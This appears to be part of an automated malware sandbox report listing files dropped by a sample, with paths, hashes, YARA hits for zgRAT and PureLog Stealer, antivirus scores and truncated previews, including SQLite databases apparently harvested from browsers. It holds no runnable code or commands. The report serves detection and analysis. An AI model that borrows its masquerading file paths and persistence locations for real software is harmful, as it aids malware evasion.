                                                                                                                                SSDEEP:24576:wwkCsYsgFFuqj/oBxyALwMosh651ZBvISmXqD0Z+rtyumwwI3PXGSfaeiLUb+7xE:B5kBTXYD3Yo0ZKy7IfXGfLU67x6sg
                                                                                                                                MD5:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                SHA1:07120124F394EDDB46C3C2A985063718D17FC48D
                                                                                                                                SHA-256:4ACC21CE239F8EADCA573C53B92CC49B96A9D7B96F7CFE4A5511847148839A2A
                                                                                                                                SHA-512:BFC1CB74B69F1BC0E47EEFEE7614760EDFE068AC9471ED211A87D4B1A47F8F2E784DB2BEB79B23988BA7810D525EB2463F75EACF0DF9F560A2D2E0E52A0E7C7F
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;xg.................z..........>.... ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...Dx... ...z.................. ..`.rsrc... ............|..............@....reloc..............................@..B................ .......H......................|......f........................................0..........(.... ........8........E................=...8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..<....... ........8........E........t.......P...............8....~....(O... .... .... ....s....~....(S....... ....~....{w...9....& ....8....8.... ....~....{....9v...& ....8k.......~....(W...~....([... ....<3... ....8?...~....9:... ....~....{....9!..

                                                                                                                                C:\Program Files (x86)\Windows Mail\Memory Compression.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcce5de0e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1310720
                                                                                                                                Entropy (8bit):0.6585653987041865
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                MD5:5C2299ABA1335C9CBB53E4111A9FF68B
                                                                                                                                SHA1:3F0CBFFF9BBBD3E22DA8122AE53A19751046EBDB
                                                                                                                                SHA-256:F3D91D0C1871955A2411ECA5B4A6456DDAA1F92300AF8A643ED48F9CD044A202
                                                                                                                                SHA-512:8B0306B6C06F2C7B2C28F86071EC4BD9031BFB5294439C531B79829563418225422F4D2A7190D5B383BBE85E3F8C14B9AB6E0D404DA3F290F8694C3B5CD2DD37
                                                                                                                                Malicious:false
                                                                                                                                Preview:....... ...............X\...;...{......................0.z..........{.......}..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................10.&.....}m.................$.d......}5..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Recovery\46422b70bfe73b

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):166
                                                                                                                                Entropy (8bit):5.69244455513106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:/XimgKS3CcL+g+zxE5pOhF1ubDEcHpmIKwITFKsdZoU1mh0Jj841mb8XnnwlpONV:fodycLfgE5wyEcHphITFKsdZoU1UKj8K
                                                                                                                                MD5:1070CC53C0A332FDD93C4E2ABD5D8AF7
                                                                                                                                SHA1:15F3EE321976651F5E49B64BAED0CC0C67340161
                                                                                                                                SHA-256:8F1B80536CAB9596DA1E1925045F524814ACE9E704526250C42150B1342D6B2B
                                                                                                                                SHA-512:261778E5CA142E2116DBC815B9AA7744C889BA603C0C2E4FE8510CABE20C934BB53E9D174294C5A1AE734E969AF29608954E90FCCB22BB2EED5C72CF2B4B5E3F
                                                                                                                                Malicious:false
                                                                                                                                Preview:k5rG92yQYueo0C6rBg9nrPAEHidrgeLUKO5uMlEWLfIJ2q2TmXY322cU4m8bZHu3jJdmHLfacnbLH1LbpKEIFSbSvl0jnm6DvOksMQLa28aOaQMDagwPCmyQrL0gV5w0qYa3QdOZ8oPH1N1fYwIGzrBJZUABZpF7LkhC0S

                                                                                                                                C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1933824
                                                                                                                                Entropy (8bit):7.542672428749591
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:wwkCsYsgFFuqj/oBxyALwMosh651ZBvISmXqD0Z+rtyumwwI3PXGSfaeiLUb+7xE:B5kBTXYD3Yo0ZKy7IfXGfLU67x6sg
                                                                                                                                MD5:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                SHA1:07120124F394EDDB46C3C2A985063718D17FC48D
                                                                                                                                SHA-256:4ACC21CE239F8EADCA573C53B92CC49B96A9D7B96F7CFE4A5511847148839A2A
                                                                                                                                SHA-512:BFC1CB74B69F1BC0E47EEFEE7614760EDFE068AC9471ED211A87D4B1A47F8F2E784DB2BEB79B23988BA7810D525EB2463F75EACF0DF9F560A2D2E0E52A0E7C7F
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;xg.................z..........>.... ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...Dx... ...z.................. ..`.rsrc... ............|..............@....reloc..............................@..B................ .......H......................|......f........................................0..........(.... ........8........E................=...8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..<....... ........8........E........t.......P...............8....~....(O... .... .... ....s....~....(S....... ....~....{w...9....& ....8....8.... ....~....{....9v...& ....8k.......~....(W...~....([... ....<3... ....8?...~....9:... ....~....{....9!..

                                                                                                                                C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):847
                                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LaHYItspByFGQiJUMBgDGadp.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):847
                                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Memory Compression.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):847
                                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Udzp7lL5ns.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1607
                                                                                                                                Entropy (8bit):5.361331326633374
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iqbYqGSI6oPtzHeqKktVTqZ4vtpv
                                                                                                                                MD5:EFAAB5F857466904742A13B17E993822
                                                                                                                                SHA1:6CD78B3052F887B787B47559B0C578DA1E76F0E8
                                                                                                                                SHA-256:F13D86DE2484AE4B0E3E8B869DA8F5A18CBE72AB0A41939B5D42A47DD84BFA0D
                                                                                                                                SHA-512:6B1A9F61D4949A88F1552276E926132804B553606B7946757BFE4868270C05B2BEAEE4FBE56552D04E78E26B3E7AC5886363356F9BE4BBD68127CA0BF5304C35
                                                                                                                                Malicious:true
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e................................................@..........

                                                                                                                                C:\Users\user\AppData\Local\Temp\06siWx4sia

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\0GrSliLTyG

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\0Wqvo2EToc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\0nSpzv8lXb

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\0sXUldZcC6

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\13nwo4UBz8

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\14H2LtWOxc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\1L6TPGPvVF

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\2Gv1MwuBSI

                                                                                                                                Download File
